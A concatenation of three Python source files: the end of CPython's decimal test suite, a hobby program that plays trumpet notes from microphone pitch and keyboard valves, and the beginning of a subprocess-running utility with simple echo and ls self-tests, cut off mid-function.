self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
pytrumpet.py
|
#!/usr/bin/python
##
# trumpet.py : Play trumpet using your computer through python
#
# trumpet.py allows you to play a sound font by using your keyboard as valves,
# and your microphone to listen to the sound produced by a mouthpiece. Using
# these two features a note is played using Fluidsynth (via mingus) from a
# soundfont.
#
# Developers: Christopher Woodall <chris.j.woodall@gmail.com>
# Date: June 02, 2014
# Version: 0.1
##
# Import multiprocessing library to try to deal with the audio input
from multiprocessing import Value, Process
# Import PyGame to make a nice UI, easily (possibly move to pytkinter?)
import pygame
from pygame.locals import *
# Import mingus to play notes using a soundfont (found in the soundfont folder)
from mingus.containers.Note import Note
from mingus.midi import fluidsynth
# Import portaudio bindings (pyaudio), struct (to unpack), and scipy and numpy
# (fft and signal processing helper functions)
import pyaudio as pa
import numpy as np
import scipy as sp
import scipy.signal
import struct
import sys, argparse, operator
def block2short(block):
"""
Take a binary block produced by pyaudio and turn it into an array of
shorts. Assumes the pyaudio.paInt16 datatype is being used.
"""
# Each entry is 2 bytes long and block appears as a binary string (array
# of 1 byte characters). So the length of our final binary string is the
# length of the block divided by 2.
sample_len = len(block)/2
fmt = "%dh" % (sample_len) # create the format string for unpacking
return struct.unpack(fmt, block)
class Trumpet(object):
"""
Trumpet class which plays notes and also contains the logic for turning a
pygame keystate array into a valve position, and for determining which
harmonic should be triggered.
At the time the actual slotting is not implemented so long as a tone within
a harmonic range is being sent the note will play in tune. Future versions
should allow for detuning a note and volume control. (FIXME)
"""
default_freq_ranges = [(163,234),
(234,350),
(350,467),
(467,588),
(588,784)] # FIXME: add remaining ranges and fine-tune
default_note_mapping = [
# 000 , 100 , 010 , 110 , 001 , 101 , 011 , 111
# First Range
['A#-3','G#-3','A-3' ,'G-3' ,'F#-3','F-3' ,'F#-3','E-3'],
# Second Range
['F-4' ,'D#-4','E-4' ,'D-4' ,'B-3' ,'C-4' ,'C#-4','B-3'],
# Third Range
['A#-4','G#-4','A-4' ,'G-4' ,'F-4','F-4' ,'F#-4' ,'E-4'],
# Fourth Range
['D-5' ,'C-5','C#-5' ,'B-4' ,'B-3' ,'C-4' ,'C#-4','B-3'],
# Fifth Range
['F-5' ,'D#-5','E-5' ,'D-5' ,'B-4' ,'C-6' ,'C#-6','B-4'],
]
default_valve_mapping=[K_a, K_s, K_d]
def __init__(self,
soundfont_file,
soundfont_driver="alsa",
valve_mapping=default_valve_mapping,
freq_ranges=default_freq_ranges,
note_mapping=default_note_mapping):
"""
Initialize Trumpet
"""
self.valve_mapping = valve_mapping # Valve to key map
self.freq_ranges = freq_ranges # Freq range to harmonic series
# Note mapping indexed as [freq range index][valve combo (index)]
self.note_mapping = note_mapping
# Initialize Fluidsynth
self.soundfont_file = soundfont_file
self.soundfont_driver = soundfont_driver
fluidsynth.init(soundfont_file, soundfont_driver)
# Keep track of the current note state
self.current_note = ""
self.prev_freq = 0
def play_Note(self, freq, keys, vol=1):
"""
"""
next_note = self.lookup_Note(freq, keys)
if next_note != self.current_note:
if self.current_note:
fluidsynth.stop_Note(Note(self.current_note),1)
print "playing note {0}".format(next_note)
fluidsynth.play_Note(Note(next_note),1)
self.current_note = next_note
def stop_Note(self):
"""
"""
if self.current_note:
fluidsynth.stop_Note(Note(self.current_note),1)
print "stopping note"
self.current_note = ""
def lookup_Note(self, freq, keys):
"""
"""
if ((freq + 20) > self.prev_freq) and ((freq - 20) < self.prev_freq):
print "Hysterisis"
freq = self.prev_freq
self.prev_freq = freq
return self.note_mapping[self.freq2idx(freq)][self.keys2valve_idx(keys)]
def keys2valve_idx(self, keys):
"""
Turns a pygame keys status array into a index for indexing into the
note_mapping array. Uses the indexe in keys specified by the
valve_mapping array.
"""
return reduce(operator.or_, [keys[self.valve_mapping[i]]<<i for i in range(3)])
def freq2idx(self, freq):
"""
Convert a frequency input to an index for indexing into the
note_mapping array
TODO: - Make it handle out of range frequencies better.
"""
for idx, freq_range in enumerate(self.freq_ranges):
if (freq >= freq_range[0]) and (freq < freq_range[1]):
return idx
return 0
class TrumpetState(object):
"""
Object which holds shared state of various elements of the trumpet
interface. Most notably the run/error state between processes and
the frequency value.
"""
RUNNING = 1
STOP = 0
def __init__(self):
self.state = Value('i', self.RUNNING)
self.frequency = Value('d', 0)
def get_state(self):
return self.state.value
def write_state(self, new_state):
self.state.value = new_state
return self.state.value
def get_frequency(self):
return self.frequency.value
def write_frequency(self, new_frequency):
self.frequency.value = new_frequency
return self.frequency.value
class TrumpetDisplay(object):
"""
"""
def texts(self, text_str, pos):
"""
"""
font=pygame.font.Font(None,30)
scoretext=font.render(text_str, 1, (255,255,255))
self.screen.blit(scoretext, pos)
def __init__(self, trumpet_state, xy=(400,35)):
"""
"""
self.trumpet_state = trumpet_state
self.trumpet_state.write_state(self.trumpet_state.RUNNING)
self.xy = xy
pygame.init()
self.screen = pygame.display.set_mode(xy)
self.keys = []
self.stop_timer = 0
self.prev_note = ""
def cleanup(self):
"""
"""
pygame.quit()
print "Quitting pygame"
def update_display(self, tpt):
"""
"""
frequency = self.trumpet_state.get_frequency()
# Look for crucial events and updated the state
# exits with state of self.run_state
for event in pygame.event.get():
if event.type == QUIT:
self.trumpet_state.write_state(self.trumpet_state.STOP)
return -1
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.trumpet_state.write_state(self.trumpet_state.STOP)
return -1
keys = pygame.key.get_pressed()
self.screen.fill((0, 0, 0))
try:
if frequency < tpt.freq_ranges[0][0]:
self.texts("Silence", (5,5))
tpt.stop_Note()
else:
tpt.play_Note(frequency, keys)
self.texts("Freq: {0} | Note: {1}".format(
frequency, tpt.current_note),(5,5))
except KeyboardInterrupt:
raise
except:
print "Unexpected error:", sys.exc_info()[0]
raise
pygame.display.update()
def audio_processing_worker(trumpet_state, dev_idx=3, rate=44100):
"""
"""
# Set initialization variables to interface
# with microphone/alsa input channel
__CHUNK__ = 4096
__FORMAT__ = pa.paInt16
__CHANNELS__ = 1
__RATE__ = rate
__DEV_INDEX__ = dev_idx
# Open and start a pyaudio audio stream
audio = pa.PyAudio()
stream = audio.open(format = __FORMAT__,
channels = __CHANNELS__,
frames_per_buffer = __CHUNK__,
input = True,
input_device_index = __DEV_INDEX__,
rate = __RATE__)
# Setup a filter to run over the time domain information. Cutoff at 1kHz
filter_order = 255
filter_cutoff = 1000.0 / (__RATE__/2.0)#Hz
fir = sp.signal.firwin(filter_order + 1, filter_cutoff)
N = 16 # downsampling coefficient
# Setup index to frequency mapping (taking into account downsampling)
freqs = np.linspace(0,__RATE__/(2*N), __CHUNK__/(2*N))
# Start audiostream
stream.start_stream()
previous_block = []
while trumpet_state.get_state() is trumpet_state.RUNNING:
try:
# Retrieve stream data.
block = stream.read(__CHUNK__)
prev_block = block
except KeyboardInterrupt:
raise
except:
print "dropped"
block = prev_block
# turn block of binary data into an array of ints that can be
# processed using scipy and numpy
data = block2short(block)
# Apply anti-aliasing low pass filter with cutoff of 1kHz
data_filt = sp.signal.lfilter(fir, 1.0, data)
# subsample by 16 to go from 44200Hz to 2762.5 Hz.
# This is much closer to the sampling rate an embedded device might
# have considering that we actually don't need to see frequencies about
# 1kHz or so.
data_ds = data_filt[0::N]
# Take the FFT and extract the magnitude.
mag = abs(np.fft.rfft(data_ds))
# Find the max frequency spike. Let us just sort of assume this is
# in the frequency range of the harmonic we want to play. This
# appears to be mostly accurate for trumpet mouhtpieces. Completely
# inaccurate for whistling though.
trumpet_state.write_frequency(freqs[np.where(mag == max(mag))])
# Stop and close the stream then exit the function when the
# state changes.
stream.stop_stream()
stream.close()
audio.terminate()
if __name__ == '__main__':
cli_argparser = argparse.ArgumentParser(description='Play trumpet using your computer')
cli_argparser.add_argument('-s', '--soundfont',
action='store', default='default.sf2')
cli_argparser.add_argument('-d', '--dev-idx',
action='store', default='3')
cli_argparser.add_argument('-r', '--rate',
action='store', default='44100')
cli_args = cli_argparser.parse_args(sys.argv[1:])
# Initialize Trumpet and TrumpetDisplay
tpt = Trumpet(cli_args.soundfont)
trumpet_state = TrumpetState()
disp = TrumpetDisplay(trumpet_state)
# Start state variables for frequency and run_state. These will
# be updated inside of the audio_processing_worker "function"/process.
# Start running the audio_processing_worker function as a process with shared memory
# (run_state) and freq. for freq audio_processing_worker is a producer and nothing
# else should write to freq. However, for run_state it is a consumer and
# does not write to it. The process will exit when run_state becomes false.
input_tone_p = Process(target=audio_processing_worker, args=(trumpet_state, int(cli_args.dev_idx), int(cli_args.rate)))
input_tone_p.start()
try:
while trumpet_state.get_state() is trumpet_state.RUNNING:
disp.update_display(tpt)
finally:
# Clean
print "Cleaning Up",
input_tone_p.join()
print "!!",
tpt.stop_Note()
print "!!!"
disp.cleanup()
print "Exiting. Have a nice day."
|
easy_run.py
|
from __future__ import absolute_import, division, print_function
import os
import subprocess
import sys
import threading
import signal
from six.moves import range
def _show_lines(lines, out, prefix):
if (out is None): out = sys.stdout
for line in lines:
print(prefix+line, file=out)
def macos_dyld():
'''
Convenience function for returning either DYLD_LIBRARY_PATH or
DYLD_FALLBACK_LIBRARY_PATH (for conda environments)
'''
dyld_options = ['DYLD_LIBRARY_PATH', 'DYLD_FALLBACK_LIBRARY_PATH']
for dyld in dyld_options:
dyld_path = os.environ.get(dyld)
if (dyld_path is not None):
return '%s="%s"' % (dyld, dyld_path)
return 'DYLD_LIBRARY_PATH= '
class fully_buffered_base(object):
def format_errors_if_any(self):
assert not self.join_stdout_stderr
if (len(self.stderr_lines) != 0):
msg = ["child process stderr output:"]
msg.append(" command: " + repr(self.command))
for line in self.stderr_lines:
msg.append(" " + line)
return "\n".join(msg)
if (self.return_code != 0):
return "non-zero return code: %s"%(self.return_code)
return None
def raise_if_errors(self, Error=RuntimeError):
assert not self.join_stdout_stderr
msg = self.format_errors_if_any()
if (msg is not None):
raise Error(msg)
return self
def raise_if_output(self, show_output_threshold=10, Error=RuntimeError):
def start_msg():
result = ["unexpected child process output:"]
result.append(" command: " + repr(self.command))
return result
if (self.stdout_buffer is not None):
if (len(self.stdout_buffer) != 0):
msg = start_msg()
msg.append(" length of output: %d bytes" % len(self.stdout_buffer))
raise Error("\n".join(msg))
elif (len(self.stdout_lines) != 0):
msg = start_msg()
for line in self.stdout_lines[:show_output_threshold]:
msg.append(" " + line)
n = len(self.stdout_lines)
if (n > show_output_threshold):
if (n <= show_output_threshold+2):
for line in self.stdout_lines[show_output_threshold:n]:
msg.append(" " + line)
else:
msg.append(" ...")
msg.append(" remaining %d lines omitted."
% (n-show_output_threshold))
raise Error("\n".join(msg))
return self
def raise_if_errors_or_output(self, Error=RuntimeError):
self.raise_if_errors(Error=Error)
self.raise_if_output(Error=Error)
return self
def show_stderr(self, out=None, prefix=""):
_show_lines(lines=self.stderr_lines, out=out, prefix=prefix)
def show_stdout(self, out=None, prefix=""):
assert self.stdout_lines is not None
_show_lines(lines=self.stdout_lines, out=out, prefix=prefix)
class fully_buffered_simple(fully_buffered_base):
"""\
Executes command, sends stdin_lines (str or sequence), then reads
stdout_lines first, stderr_lines second (if join_stdout_stderr
is False).
The constructor may deadlock if the I/O buffers are too small to allow
the blocking write and reads in the given sequence. Specifically,
stdin_lines may be too big, or there may be too many stderr_lines,
but there can be any number of stdout_lines. The tests below are
known to work under Mac OS X, Windows XP, IRIX, and Tru64 Unix with
stdin_lines up to 1000000, stderr_lines up to 500. I.e. this simple
implementation should cover most practical situations.
"""
def __init__(self,
command,
stdin_lines=None,
join_stdout_stderr=False,
stdout_splitlines=True,
bufsize=-1):
self.command = command
self.join_stdout_stderr = join_stdout_stderr
if (join_stdout_stderr):
child_stdin, child_stdout = os.popen4(command, "t", bufsize)
child_stderr = None
else:
child_stdin, child_stdout, child_stderr = os.popen3(command,"t",bufsize)
if (stdin_lines is not None):
if (not isinstance(stdin_lines, str)):
stdin_lines = '\n'.join(stdin_lines)
if (len(stdin_lines) != 0):
stdin_lines += '\n'
child_stdin.write(stdin_lines)
child_stdin.close()
if (stdout_splitlines):
self.stdout_buffer = None
self.stdout_lines = child_stdout.read().splitlines()
else:
self.stdout_buffer = child_stdout.read()
self.stdout_lines = None
if (child_stderr is not None):
self.stderr_lines = child_stderr.read().splitlines()
else:
self.stderr_lines = []
child_stdout.close()
if (child_stderr is not None):
child_stderr.close()
self.return_code = None
class fully_buffered_subprocess(fully_buffered_base):
"This implementation is supposed to never block."
def __init__(self,
command,
timeout=None,
stdin_lines=None,
join_stdout_stderr=False,
stdout_splitlines=True,
bufsize=-1):
def target(process, lines, result):
o, e = process.communicate(input=lines)
result[0] = o
result[1] = e
self.command = command
self.join_stdout_stderr = join_stdout_stderr
if (not isinstance(command, str)):
command = subprocess.list2cmdline(command)
# Timeout functionality based on:
# https://stackoverflow.com/questions/1191374/using-module-subprocess-with-timeout
# https://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true
if (sys.platform == 'darwin'): # bypass SIP on OS X 10.11
command = ('%s exec ' % macos_dyld()) + command
if (stdin_lines is not None):
if (not isinstance(stdin_lines, str)):
stdin_lines = '\n'.join(stdin_lines)
if (len(stdin_lines) != 0):
stdin_lines += '\n'
if (join_stdout_stderr):
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(
args=command,
shell=True,
bufsize=bufsize,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=stderr,
universal_newlines=True,
close_fds=(sys.platform != 'win32'),
preexec_fn=os.setsid if sys.platform != 'win32' else None)
if timeout is not None:
if sys.platform != 'win32':
r = [None, None]
thread = threading.Thread(target=target, args=(p, stdin_lines, r))
thread.start()
thread.join(timeout)
if thread.is_alive():
os.killpg(os.getpgid(p.pid), signal.SIGTERM)
thread.join()
o, e = r[0], r[1]
else: # sys.platform == 'win32'
# don't respect timeout for now
o, e = p.communicate(input=stdin_lines)
else:
o, e = p.communicate(input=stdin_lines)
if (stdout_splitlines):
self.stdout_buffer = None
self.stdout_lines = o.splitlines()
else:
self.stdout_buffer = o
self.stdout_lines = None
if (join_stdout_stderr):
self.stderr_lines = []
else:
self.stderr_lines = e.splitlines()
self.return_code = p.returncode
fully_buffered = fully_buffered_subprocess
def go(command, stdin_lines=None,join_stdout_stderr=True):
return fully_buffered(
command=command,
stdin_lines=stdin_lines,
join_stdout_stderr=join_stdout_stderr)
def call(command):
"""
Wraps subprocess.call to run a command.
Parameters
----------
command : str
Returns
-------
int
Exit code of subprocess.
Examples
--------
>>> from libtbx.easy_run import call
>>> ret = call("echo 1")
1
>>> print ret
0
"""
for s in [sys.stdout, sys.stderr]:
flush = getattr(s, "flush", None)
if (flush is not None): flush()
if (sys.platform == 'darwin'): # bypass SIP on OS X 10.11
command = ('%s exec ' % macos_dyld()) + command
return subprocess.call(args=command, shell=True)
def exercise(args=None):
from six.moves import cStringIO as StringIO
if (args is None): args = sys.argv[1:]
verbose = "--verbose" in args
#
if ("--simple" in args):
fb = fully_buffered_simple
else:
fb = fully_buffered
#
for command in ["echo hello world", ("echo", "hello", "world")]:
for result in [fb(command=command).raise_if_errors(),
fb(command=command, join_stdout_stderr=True),
go(command=command)]:
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["hello world"]
#
if (os.path.isfile("/bin/ls")):
for command in ["/bin/ls /bin", ("/bin/ls", "/bin")]:
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert "ls" in result.stdout_lines
if (os.path.isfile("/usr/bin/wc")):
for command in ["/usr/bin/wc -l", ("/usr/bin/wc", "-l")]:
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["0"]
result = fb(command=command, stdin_lines=["hello"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["1"]
result = fb(command=command, stdin_lines=["hello", "world"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["2"]
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
